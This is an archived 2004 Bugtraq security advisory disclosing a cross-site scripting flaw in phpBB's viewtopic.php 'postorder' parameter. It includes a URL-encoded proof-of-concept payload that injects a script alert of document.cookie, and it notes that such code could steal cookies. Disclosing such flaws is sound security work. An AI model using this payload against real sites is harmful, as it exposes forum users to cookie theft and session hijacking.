[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: New phpBB ViewTopic.php Cross Site Scripting Vulnerability
From: Cheng Peng Su <apple_soup () msn ! com>
Date: 2004-02-28 15:09:02
Message-ID: 20040228150902.22283.qmail () www ! securityfocus ! com
[Download RAW message or body]
################################################
Advisory Name:New phpBB ViewTopic.php Cross Site Scripting Vulnerability
Release Date: Feb 29,2004
Application: phpBB
Platform: PHP
Version Affected: the lastest version
Vendor URL: http://www.phpbb.com/
Discover: Cheng Peng Su(apple_soup_at_msn.com)
################################################
Details:
This vuln is similar to Arab VieruZ's advisory 'XSS bug in phpBB',this time the \
problem is not in 'highlight' ,but in 'postorder'.we can inject HTML code,such code \
could be used to steal cookie information.
Proof of Concept:
If there is a topic at
http://site/phpBB/viewtopic.php?t=123456
this page can be also viewed at
http://site/phpBB/viewtopic.php?t=123456&postorder=asc
then this page will contain code like below:
<a class="maintitle" \
href="viewtopic.php?t=176994&start=0&postdays=0&postorder=asc&highlight=">[Topic \
Title]</a>. phpBB doesn't filter out illegal characters from 'postorder',so we can \
inject HTML code after 'postorder='.
Exploit:
URL: http://site/phpBB/viewtopic.php?t=123456&postorder=%22%3E%3C%73%63%72%69%70%74% \
3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C
note unescape('=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C') \
== '"><script>alert(document.cookie)</script><'
Contact:
Cheng Peng Su
apple_soup_at_msn.com
Class 1,Senior 2,High school attached to Wuhan University
Wuhan,Hubei,China
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic